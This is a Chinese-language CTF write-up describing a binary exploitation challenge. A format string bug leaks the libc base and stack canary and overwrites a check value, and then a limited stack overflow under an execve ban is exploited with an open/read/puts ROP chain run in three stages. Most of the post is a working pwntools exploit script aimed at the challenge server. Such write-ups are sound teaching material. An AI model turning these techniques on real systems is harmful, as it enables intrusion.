-
-
[原创]禁用execve并限制溢出长度orw绕过
-
2022-10-30 17:09
-
前言
业余时间更新,周末帮同学远程看了看题。记录一下。
ida
将程序拖入ida中,发现在sub_401474()函数中有格式化字符串漏洞
我们可以通过格式化任意地址写把v1[0]写成0x1234,同时任意地址读获得libc地址。
绕过上面的之后 然后main函数里有个栈溢出
但禁用了exevce函数,
所以选择orw将flag给读出来。但溢出的长度有限,返回的时候将open read puts函数分三次去执行,每执行一次函数之后就返回到main函数将程序重新执行。
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 | #coding:utf8from pwn import *context(arch="amd64",os='linux',log_level="debug")p=process("./easystack")p=remote("47.92.207.120",29254)elf=ELF("./easystack")libc=ELF("libc-2.31.so")p.recvuntil("Please input: ")pd="%"+str(0x1234)+"c%7$n"+"########"+"%33$p"+"@@"+"%13$p"p.sendline(pd)p.recvuntil("########0x")libc_addr=int(p.recv(12),16)-243-libc.symbols['__libc_start_main']p.recvuntil("@@0x")canary=int(p.recv(16),16)system_addr = libc_addr + libc.symbols['system']binsh_addr = libc_addr + libc.search("/bin/sh").next()pop_rdi_ret=libc_addr+libc.search(asm("pop rdi\nret")).next()pop_rsi_ret=libc_addr+libc.search(asm("pop rsi\nret")).next()pop_rdx_ret=libc_addr+0x142c92open_addr=libc_addr+libc.symbols['open']free_hook=libc_addr+libc.symbols['__free_hook']read_addr=libc_addr+libc.symbols['read']puts_addr=libc_addr+libc.symbols['puts']print("canary : "+ hex(canary))print("pop_rdi_ret : "+ hex(pop_rdi_ret))print("system_addr : "+ hex(system_addr))print("binsh_addr : "+ hex(binsh_addr))print("libc_addr : "+ hex(libc_addr))#open(flag)p.recvuntil(">> ")p.sendline("1")pd="a"*(0x70-0x8)+p64(canary)+p64(0xdeadbeef)pd+=p64(pop_rsi_ret)+p64(0)+p64(open_addr)+p64(0x401511) print(hex(len(pd)))p.sendline(pd)p.recvuntil(">> ")p.sendline("3flag\x00")#read(3,free_hook,0x30)p.recvuntil("Please input: ")pd="%"+str(0x1234)+"c%7$n"p.sendline(pd)p.recvuntil(">> ")p.sendline("1")pd="a"*(0x70-0x8)+p64(canary)+p64(0xdeadbeef)pd+=p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(free_hook)+p64(pop_rdx_ret)+p64(0x30)+p64(read_addr)+p64(0x401511)p.sendline(pd)print(hex(len(pd)))p.recvuntil(">> ")p.sendline("3")#puts(free_hook)p.recvuntil("Please input: ")pd="%"+str(0x1234)+"c%7$n"p.sendline(pd)p.recvuntil(">> ")p.sendline("1")pd="a"*(0x70-0x8)+p64(canary)+p64(0xdeadbeef)pd+=p64(pop_rdi_ret)+p64(free_hook)+p64(puts_addr)#puts(a)p.sendline(pd)print(hex(len(pd)))p.recvuntil(">> ")p.sendline("3")p.interactive() |
成功拿到flag。
阿里云助力开发者!2核2G 3M带宽不限流量!6.18限时价,开 发者可享99元/年,续费同价!
|
|
|---|---|
